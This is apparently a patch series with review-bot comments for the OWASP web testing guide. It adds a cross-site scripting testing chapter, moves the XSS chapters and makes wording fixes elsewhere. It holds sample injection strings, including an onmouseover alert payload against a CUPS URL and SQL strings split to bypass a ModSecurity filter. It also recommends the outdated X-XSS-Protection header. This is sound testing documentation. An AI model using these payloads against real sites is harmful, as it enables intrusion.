@@ -0,0 +1,109 @@ +# Testing for Cross Site Scripting + +|ID | +|------------| +|WSTG-CLNT-01| + +## Summary + +Cross-Site Scripting (XSS) testing checks if it is possible to inject malicious scripts into a web application, which are then executed by users' browsers. XSS vulnerabilities occur when user-supplied input is not properly validated or sanitized before being included in the application's output. Successful exploitation of an XSS vulnerability allows attackers to execute arbitrary JavaScript code within the context of a victim's browser, leading to various attacks such as session hijacking, defacement, or stealing sensitive information. + +XSS attacks can be classified into the following three types: + +Stored XSS: The malicious script is permanently stored on the target server and is served to users when they access a particular page or view specific content. + +Reflected XSS: The malicious script is embedded in a URL and is reflected back to the user by the web application, typically as part of an error message or search result. + +DOM-based XSS: The vulnerability arises from insecure handling of client-side JavaScript in the Document Object Model (DOM) of a web page. The malicious script is directly executed by the victim's browser. + +An XSS attack occurs when an attacker can inject untrusted data into a web application, which is then included in a response that is sent to other users. This untrusted data can be included in various contexts within an HTML document, including: + +HTML tags: If user-supplied input is inserted without proper encoding into HTML tags, it can lead to script execution. For example: +```js + +``` +HTML attributes: If user-supplied input is included in HTML attributes without proper encoding, it can be exploited to execute scripts. For example: + +```js + +``` +JavaScript code: If user-supplied input is directly inserted into JavaScript code without proper escaping or validation, it can lead to script execution. 
For example, + +```js +var userInput = '<%= userInput %>'; + +``` + +URLs: If user-supplied input is included in URLs without proper encoding, it can result in script execution. For example, + +```js +https://example.com/search?q= +``` + +XSS vulnerabilities can have severe consequences, ranging from stealing sensitive user information to performing actions on behalf of the user, such as modifying account settings or making unauthorized transactions. + +## Test Objectives + +Identify input fields or parameters vulnerable to XSS attacks. +Assess the impact and severity of XSS vulnerabilities. +Validate the effectiveness of input validation and output encoding mechanisms in preventing XSS attacks. + +## How to Test + +### Detection Techniques + +The first step in XSS testing is to identify all user-supplied input fields or parameters within the web application. This includes input fields in web forms, query string parameters in URLs, hidden form fields, cookies, headers, and any other input sources that are used to generate dynamic content. + +Once the input fields or parameters are identified, the following techniques can be employed to detect XSS vulnerabilities: + +HTML Injection: Inject HTML tags and check if they are rendered as part of the web page. For example: +```js + +``` + +If the injected HTML tags are not properly sanitized, they will be interpreted and executed by the browser. + +Attribute Injection: Inject special characters or event handlers into HTML attributes and check if they are executed. For example: + +```js +"> +``` + +If the injected content is rendered without proper encoding, the browser will interpret it as part of the attribute value, leading to script execution. + +JavaScript Injection: Inject JavaScript code into areas of the application where it is expected to be executed. This includes JavaScript code within ` +``` + +If the injected script is not properly encoded, it will be interpreted as part of the URL and executed by the browser. 
+ +Context-Specific Injection: Test for XSS vulnerabilities in specific contexts such as input fields used in search functionality, comment sections, messaging systems, or any other areas where user-supplied input is displayed to other users. + +During testing, it is important to observe the behavior of the application and analyze the responses received. Look for any unexpected execution of scripts or the presence of injected content within the rendered HTML source code. Additionally, monitor the network traffic to identify any requests or responses that contain suspicious or unexpected content. + +It is recommended to test various browsers to ensure cross-browser compatibility of the identified XSS vulnerabilities. + +## Remediation + +To mitigate XSS vulnerabilities, the following best practices should be implemented: + +Input Validation: Perform strict input validation on all user-supplied input. Accept only the expected characters and reject or sanitize any input that contains special characters or script-like content. + +Output Encoding: Encode all user-supplied input that is rendered within HTML, JavaScript, or URL contexts. Use proper encoding mechanisms specific to the context, such as HTML entity encoding, JavaScript escaping, or URL encoding. + +Content Security Policy (CSP): Implement a strong CSP to restrict the execution of scripts from external sources and enforce a whitelist of trusted sources for content. + +HTTP Only Cookies: Set the "HttpOnly" flag for session cookies to prevent access from client-side scripts, reducing the risk of session theft via XSS. + +X-XSS-Protection Header: Enable the X-XSS-Protection header with the "1; mode=block" directive to instruct browsers to block or sanitize detected XSS attacks. + +Contextual Output Encoding: Apply output encoding based on the context in which the user-supplied input is rendered. Different encoding mechanisms may be required for HTML, JavaScript, or URL contexts. 
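Review bot: the fenced examples in the new 01-Testing_for_Cross_Site_Scripting.md are all tagged `js`, yet most of them hold HTML markup or a bare URL rather than JavaScript (the block containing only `https://example.com/search?q=` is the clearest case); tag the HTML examples `html` and the URL example `text` so the markdown linter and highlighting treat them correctly. Two further points on the same file: the three XSS types, the Test Objectives and the Remediation items are written as bare paragraphs, whereas the guide's other chapters use a `- ` bullet per item for such lists; and the Remediation section recommends `X-XSS-Protection` with `1; mode=block`, a header that current browsers no longer honour (Chromium removed its XSS auditor in 2019 and Firefox never implemented it) and that OWASP's own header guidance now says to set to `0` or omit, so that item should be dropped rather than carried into a new chapter. Minor: "Output Encoding" and "Contextual Output Encoding" describe the same control and can be merged, and "whitelist" should be "allow list" per house style.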
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md rename to document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md index 7927eb06d9..4b2da3a0c2 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md @@ -1,9 +1,5 @@ # Testing for Reflected Cross Site Scripting -|ID | -|------------| -|WSTG-INPV-01| - ## Summary Reflected [Cross-site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/) occur when an attacker injects browser executable code within a single HTTP response. The injected attack is not stored within the application itself; it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page. The attack string is included as part of the crafted URI or HTTP parameters, improperly processed by the application, and returned to the victim. diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.md rename to document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md index b7f9de9543..0af255b50c 100644 
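Review bot: the reflected-XSS hunk (and the stored-XSS hunk that follows it) deletes the `|WSTG-INPV-01|` / `|WSTG-INPV-02|` ID table without assigning a replacement, while the new parent chapter takes `WSTG-CLNT-01`, the ID the DOM-based chapter carried until this patch. Every WSTG chapter needs a unique, stable ID because the checklist and external references are keyed on it; either give the four 01.x sub-chapters their own IDs or state in the parent chapter how they are identified. The rename out of 07-Input_Validation_Testing also changes the paths that other chapters and the index link to, and this patch touches only the XSS chapters and their images, so please confirm those links were checked (the commit message does not mention it).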
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md @@ -1,9 +1,5 @@ # Testing for Stored Cross Site Scripting -|ID | -|------------| -|WSTG-INPV-02| - ## Summary Stored [Cross-site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/) is the most dangerous type of Cross Site Scripting. Web applications that allow users to store data are potentially exposed to this type of attack. This chapter illustrates examples of stored cross site scripting injection and related exploitation scenarios. diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md similarity index 97% rename from document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting.md rename to document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md index ce9dffc197..b0eed18c1b 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.3-Testing_for_DOM-based_Cross_Site_Scripting.md @@ -1,8 +1,10 @@ -# Testing for DOM-Based Cross Site Scripting +cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html). + +## References -|ID | -|------------| -|WSTG-CLNT-01| +- [DomXSSWiki](https://github.com/wisec/domxsswiki/wiki/) +- [DOM XSS article by Amit Klein](http://www.webappsec.org/projects/articles/071105.html) +# Testing for DOM-Based Cross Site Scripting ## Summary 
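Review bot: the first hunk of 01.3-Testing_for_DOM-based_Cross_Site_Scripting.md inserts the tail of a URL (`cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).`), a `## References` heading and its two links above the `# Testing for DOM-Based Cross Site Scripting` H1, so the file now opens with a dangling link fragment and the title is no longer its first line, which breaks the guide's chapter layout and the lint rule that a chapter starts with its top-level heading. This looks like an editor cut-and-paste accident rather than an intended change; revert the hunk so the file begins with the H1 and keep the ID table removal as the only edit here.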
@@ -91,9 +93,4 @@ Manual testing should therefore be undertaken and can be done by examining areas ## Remediation -For measures to prevent DOM-based XSS, see the [DOM-based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html). - -## References - -- [DomXSSWiki](https://github.com/wisec/domxsswiki/wiki/) -- [DOM XSS article by Amit Klein](http://www.webappsec.org/projects/articles/071105.html) +For measures to prevent DOM-based XSS, see the [DOM-based XSS Prevention Cheat Sheet](https:// \ No newline at end of file diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.4-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md similarity index 100% rename from document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md rename to document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.4-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/Alert.png b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/Alert.png similarity index 100% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/Alert.png rename to document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/Alert.png 
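Review bot: the second hunk in the same file is the other half of the displaced text: the Remediation link is cut off at `https://` (with `\ No newline at end of file`) and the `## References` section is deleted from the end, so after this patch the chapter ends with a broken link and has no references where the guide expects them. Restore the original ending, the full cheat-sheet link followed by the References list, and check the rendered file before resubmitting; the drop to a 97% similarity index for what should be a pure rename is the tell.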
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/Stored_input_example.jpg b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/Stored_input_example.jpg similarity index 100% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/Stored_input_example.jpg rename to document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/Stored_input_example.jpg diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/Stored_xss_example.jpg b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/Stored_xss_example.jpg similarity index 100% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/Stored_xss_example.jpg rename to document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/Stored_xss_example.jpg diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/XSS_Example1.png b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/XSS_Example1.png similarity index 100% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/XSS_Example1.png rename to document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/XSS_Example1.png diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/XSS_Example2.png b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/XSS_Example2.png similarity index 100% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/images/XSS_Example2.png rename to document/4-Web_Application_Security_Testing/11-Client-side_Testing/images/XSS_Example2.png From 3188789390f8971bb1454a65703e9d2bcadf0da7 Mon Sep 17 00:00:00 2001 
From: Manindar Mohan Date: Fri, 30 Jun 2023 15:17:54 +0530 Subject: [PATCH 03/37] mistakes fixed --- .../01-Testing_for_Cross_Site_Scripting.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md index 3a3979c2c1..1e4229772c 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md @@ -100,7 +100,7 @@ Input Validation: Perform strict input validation on all user-supplied input. Ac Output Encoding: Encode all user-supplied input that is rendered within HTML, JavaScript, or URL contexts. Use proper encoding mechanisms specific to the context, such as HTML entity encoding, JavaScript escaping, or URL encoding. -Content Security Policy (CSP): Implement a strong CSP to restrict the execution of scripts from external sources and enforce a whitelist of trusted sources for content. +Content Security Policy (CSP): Implement a strong CSP to restrict the execution of scripts from external sources and enforce a allow list(s) of trusted sources for content. HTTP Only Cookies: Set the "HttpOnly" flag for session cookies to prevent access from client-side scripts, reducing the risk of session theft via XSS. From 83043812ace21352d8a44dac3111e677cdcd3642 Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Fri, 30 Jun 2023 15:44:02 +0530 Subject: [PATCH 04/37] mistake fixed for 07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution (#591) --- .../02-Testing_for_HTTP_Parameter_Pollution.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
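Review bot: in the patch 03/37 hunk for 01-Testing_for_Cross_Site_Scripting.md, the replacement `enforce a allow list(s) of trusted sources` is ungrammatical; write `enforce an allow list of trusted sources`. Since this corrects a line introduced two commits earlier in the same series, fold it into that commit rather than adding a `mistakes fixed` commit on top.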
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution.md index 64b6a048e3..921a8c6c56 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution.md 
@@ -20,7 +20,7 @@ In 2009, immediately after the publication of the first research on HTTP Paramet One of these flaws, affecting *ModSecurity SQL Injection Core Rules*, represents a perfect example of the impedance mismatch between applications and filters. The ModSecurity filter would correctly apply a deny list for the following string: `select 1,2,3 from table`, thus blocking this example URL from being processed by the web server: `/index.aspx?page=select 1,2,3 from table`. However, by exploiting the concatenation of multiple HTTP parameters, an attacker could cause the application server to concatenate the string after the ModSecurity filter already accepted the input. As an example, the URL `/index.aspx?page=select 1&page=2,3` from table would not trigger the ModSecurity filter, yet the application layer would concatenate the input back into the full malicious string. -Another HPP vulnerability turned out to affect *Apple Cups*, the well-known printing system used by many UNIX systems. Exploiting HPP, an attacker could easily trigger a Cross-Site Scripting vulnerability using the following URL: `http://127.0.0.1:631/admin/?kerberos=onmouseover=alert(1)&kerberos`. The application validation checkpoint could be bypassed by adding an extra `kerberos` argument having a valid string (e.g. empty string). As the validation checkpoint would only consider the second occurrence, the first `kerberos` parameter was not properly sanitized before being used to generate dynamic HTML content. Successful exploitation would result in JavaScript code execution under the context of the hosting web site. +Another HPP vulnerability turned out to affect *Apple Cups*, the well-known printing system used by many UNIX systems. Exploiting HPP, an attacker could easily trigger a Cross-Site Scripting vulnerability using the following URL: `http://127.0.0.1:631/admin/?kerberos=onmouseover=alert(1)&kerberos`. 
The application validation checkpoint could be bypassed by adding an extra `kerberos` argument having a valid string (e.g. empty string). As the validation checkpoint would only consider the second occurrence, the first `kerberos` parameter was not properly sanitized before being used to generate dynamic HTML content. Successful exploitation would result in JavaScript code execution under the context of the hosting site. ### Authentication Bypass @@ -54,7 +54,7 @@ Given the URL and querystring: `http://example.com/?color=red&color=blue` | JSP, Servlet / Jetty | First occurrence only | color=red | | IBM Lotus Domino | Last occurrence only | color=blue | | IBM HTTP Server | First occurrence only | color=red | - | node.js / express | First occurrence only | color=red | + | Node.js / express | First occurrence only | color=red | | mod_perl, libapreq2 / Apache | First occurrence only | color=red | | Perl CGI / Apache | First occurrence only | color=red | | mod_wsgi (Python) / Apache | First occurrence only | color=red | From c5277d45c88e4d861378d49275676a7566801601 Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Fri, 30 Jun 2023 15:44:55 +0530 Subject: [PATCH 05/37] mistake fixed for 07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution (#591) --- .../07-Input_Validation_Testing/03.1-Testing_for_Oracle.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.1-Testing_for_Oracle.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.1-Testing_for_Oracle.md index 5e256dc85d..029558767a 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.1-Testing_for_Oracle.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.1-Testing_for_Oracle.md 
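Review bot: in the first HPP hunk of patch 04/37, while the Apple CUPS paragraph is being reworded, also fix the misplaced backtick in the ModSecurity context line just above it: the closing backtick ends the URL after `2,3` although `from table` is part of the injected value, so the whole `/index.aspx?page=select 1&page=2,3 from table` should be inside the code span. The product name is also `CUPS`, not `Cups`.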
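Review bot: in the parameter-handling table hunk of patch 04/37, `node.js` is capitalized to `Node.js` but its partner `express` on the same row stays lowercase; Express is a product name too, so make the row `Node.js / Express` for consistency with `Perl CGI / Apache` and the other rows.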
@@ -106,7 +106,7 @@ On older versions of the PL/SQL Gateway, it is possible to directly access the p `http://www.example.com/pls/dad/owa_util.signature` -returns the following output on the webpage +returns the following output on the web page `"This page was produced by the PL/SQL Web Toolkit on date"` From b96069f1d7ac0484d83c6057c93bae4c530c2645 Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Fri, 30 Jun 2023 15:47:17 +0530 Subject: [PATCH 06/37] Mistake fixed 4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL (#591) --- .../07-Input_Validation_Testing/03.2-Testing_for_MySQL.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md index 65565d80fe..a17e08bfda 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md 
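Review bot: the subject of patch 05/37 says `mistake fixed for 07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution (#591)`, but the only change is `webpage` to `web page` in 03.1-Testing_for_Oracle.md; fix the commit subject (or squash these single-word style commits together) so the history of the Oracle chapter is not misleading.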
@@ -60,7 +60,7 @@ For example the following injection will result in an error: #### Fingerprinting MySQL -Of course, the first thing to know is if there's MySQL DBMS as a back end database. MySQL server has a feature that is used to let other DBMS ignore a clause in MySQL dialect. When a comment block `'/**/'` contains an exclamation mark `'/*! sql here*/'` it is interpreted by MySQL, and is considered as a normal comment block by other DBMS as explained in [MySQL manual](https://dev.mysql.com/doc/refman/8.0/en/comments.html). +Of course, the first thing to know is if there's MySQL DBMS as a backend database. MySQL server has a feature that is used to let other DBMS ignore a clause in MySQL dialect. When a comment block `'/**/'` contains an exclamation mark `'/*! sql here*/'` it is interpreted by MySQL, and is considered as a normal comment block by other DBMS as explained in [MySQL manual](https://dev.mysql.com/doc/refman/8.0/en/comments.html). Example: From 4e19ca5bbf4600b434607f5c1f327b43bf5c5c45 Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Fri, 30 Jun 2023 15:49:34 +0530 Subject: [PATCH 07/37] Mistake fixed 4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection (#591) --- .../06-Testing_for_SSI_Injection.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md index 18770d07bf..35807b6b87 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md 
@@ -72,8 +72,8 @@ User-Agent: - [Nginx SSI module](http://nginx.org/en/docs/http/ngx_http_ssi_module.html) - [Apache: Module mod_include](https://httpd.apache.org/docs/current/mod/mod_include.html) -- [IIS: Server Side Includes directives](https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525185%28v=vs.90%29) -- [Apache Tutorial: Introduction to Server Side Includes](https://httpd.apache.org/docs/current/howto/ssi.html) +- [IIS: Server-side Includes directives](https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525185%28v=vs.90%29) +- [Apache Tutorial: Introduction to Server-side Includes](https://httpd.apache.org/docs/current/howto/ssi.html) - [Apache: Security Tips for Server Configuration](https://httpd.apache.org/docs/current/misc/security_tips.html#ssi) - [SSI Injection instead of JavaScript Malware](https://jeremiahgrossman.blogspot.com/2006/08/ssi-injection-instead-of-javascript.html) - [IIS: Notes on Server-Side Includes (SSI) syntax](https://blogs.iis.net/robert_mcmurray/archive/2010/12/28/iis-notes-on-server-side-includes-ssi-syntax-kb-203064-revisited.aspx) From 6de5b1f4ed1d567a8da209c71bb74e35c48c0fdb Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Fri, 30 Jun 2023 15:50:16 +0530 Subject: [PATCH 08/37] Mistake fixed 4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection (#591) --- .../06-Testing_for_SSI_Injection.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md index 35807b6b87..94a43c8fa5 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md 
@@ -72,8 +72,8 @@ User-Agent: - [Nginx SSI module](http://nginx.org/en/docs/http/ngx_http_ssi_module.html) - [Apache: Module mod_include](https://httpd.apache.org/docs/current/mod/mod_include.html) -- [IIS: Server-side Includes directives](https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525185%28v=vs.90%29) -- [Apache Tutorial: Introduction to Server-side Includes](https://httpd.apache.org/docs/current/howto/ssi.html) +- [IIS: server-side Includes directives](https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525185%28v=vs.90%29) +- [Apache Tutorial: Introduction to server-side Includes](https://httpd.apache.org/docs/current/howto/ssi.html) - [Apache: Security Tips for Server Configuration](https://httpd.apache.org/docs/current/misc/security_tips.html#ssi) - [SSI Injection instead of JavaScript Malware](https://jeremiahgrossman.blogspot.com/2006/08/ssi-injection-instead-of-javascript.html) - [IIS: Notes on Server-Side Includes (SSI) syntax](https://blogs.iis.net/robert_mcmurray/archive/2010/12/28/iis-notes-on-server-side-includes-ssi-syntax-kb-203064-revisited.aspx) From abd0d14d1abdebcd18d30695f19fa59b900ca2a0 Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Fri, 30 Jun 2023 15:52:39 +0530 Subject: [PATCH 09/37] mistake fixed 4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_IMAP_SMTP_Injection (#591) --- .../08-Testing_for_IMAP_SMTP_Injection.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_IMAP_SMTP_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_IMAP_SMTP_Injection.md index 6b856ced34..2879946f88 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_IMAP_SMTP_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_IMAP_SMTP_Injection.md 
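Review bot: patch 08/37 rewrites the same two link titles that patch 07/37 changed a minute earlier, and the result, `IIS: server-side Includes directives`, mixes a lowercase `server-side` with a capitalized `Includes`; pick one form. These are titles of external documents, so the safest choice is to match the cited pages' own titles, and whichever form is chosen should also be applied to the untouched last item, `IIS: Notes on Server-Side Includes (SSI) syntax`, which otherwise leaves the list inconsistent. Squash 07 and 08 into one commit.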
@@ -8,14 +8,14 @@ This threat affects all applications that communicate with mail servers (IMAP/SMTP), generally webmail applications. The aim of this test is to verify the capacity to inject arbitrary IMAP/SMTP commands into the mail servers, due to input data not being properly sanitized. -The IMAP/SMTP Injection technique is more effective if the mail server is not directly accessible from Internet. Where full communication with the backend mail server is possible, it is recommended to conduct direct testing. +The IMAP/SMTP Injection technique is more effective if the mail server is not directly accessible from internet. Where full communication with the backend mail server is possible, it is recommended to conduct direct testing. -An IMAP/SMTP Injection makes it possible to access a mail server which otherwise would not be directly accessible from the Internet. In some cases, these internal systems do not have the same level of infrastructure security and hardening that is applied to the front-end web servers. Therefore, mail server results may be more vulnerable to attacks by end users (see the scheme presented in Figure 1). +An IMAP/SMTP Injection makes it possible to access a mail server which otherwise would not be directly accessible from the internet. In some cases, these internal systems do not have the same level of infrastructure security and hardening that is applied to the frontend web servers. Therefore, mail server results may be more vulnerable to attacks by end users (see the scheme presented in Figure 1). ![IMAP SMTP Injection](images/Imap-smtp-injection.png)\ *Figure 4.7.10-1: Communication with the mail servers using the IMAP/SMTP Injection technique* -Figure 1 depicts the flow of traffic generally seen when using webmail technologies. Step 1 and 2 is the user interacting with the webmail client, whereas step 2 is the tester bypassing the webmail client and interacting with the back-end mail servers directly. 
+Figure 1 depicts the flow of traffic generally seen when using webmail technologies. Step 1 and 2 is the user interacting with the webmail client, whereas step 2 is the tester bypassing the webmail client and interacting with the backend mail servers directly. This technique allows a wide variety of actions and attacks. The possibilities depend on the type and scope of injection and the mail server technology being tested. @@ -37,7 +37,7 @@ Some examples of attacks using the IMAP/SMTP Injection technique are: ### Identifying Vulnerable Parameters -In order to detect vulnerable parameters, the tester has to analyze the application's ability in handling input. Input validation testing requires the tester to send bogus, or malicious, requests to the server and analyse the response. In a secure application, the response should be an error with some corresponding action telling the client that something has gone wrong. In a vulnerable application, the malicious request may be processed by the back-end application that will answer with a `HTTP 200 OK` response message. +In order to detect vulnerable parameters, the tester has to analyze the application's ability in handling input. Input validation testing requires the tester to send bogus, or malicious, requests to the server and analyse the response. In a secure application, the response should be an error with some corresponding action telling the client that something has gone wrong. In a vulnerable application, the malicious request may be processed by the backend application that will answer with a `HTTP 200 OK` response message. It is important to note that the requests being sent should match the technology being tested. Sending SQL injection strings for Microsoft SQL server when a MySQL server is being used will result in false positive responses. In this case, sending malicious IMAP commands is modus operandi since IMAP is the underlying protocol being tested. 
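Review bot: in the first hunk of patch 09/37, the replacement `accessible from internet` drops the article; it should be `accessible from the internet`, as the next paragraph in the same hunk already has it. The rewritten Figure 1 sentence, `Step 1 and 2 is the user interacting ... whereas step 2 is the tester`, refers to step 2 twice, so one of the numbers is wrong, and the subject should be plural (`Steps 1 and 2 are`); check it against the figure while the line is being touched.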
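Review bot: the second hunk of patch 09/37 changes `back-end` to `backend` but leaves `analyze` and `analyse` side by side in the same sentence; the guide uses US spelling (`analyze`, `sanitized`, `unauthorized` elsewhere in this series), so `analyse` should become `analyze` in the same edit.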
From 13af5164c3593f07a6892906ae85c7008821a909 Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Fri, 30 Jun 2023 15:54:53 +0530 Subject: [PATCH 10/37] mistake fixed 4-Web_Application_Security_Testing/07-Input_Validation_Testing/09.1-Testing_for_File_Inclusion (#591) --- .../09.1-Testing_for_File_Inclusion.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09.1-Testing_for_File_Inclusion.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09.1-Testing_for_File_Inclusion.md index cfe6bc886d..a882c9fb64 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09.1-Testing_for_File_Inclusion.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09.1-Testing_for_File_Inclusion.md 
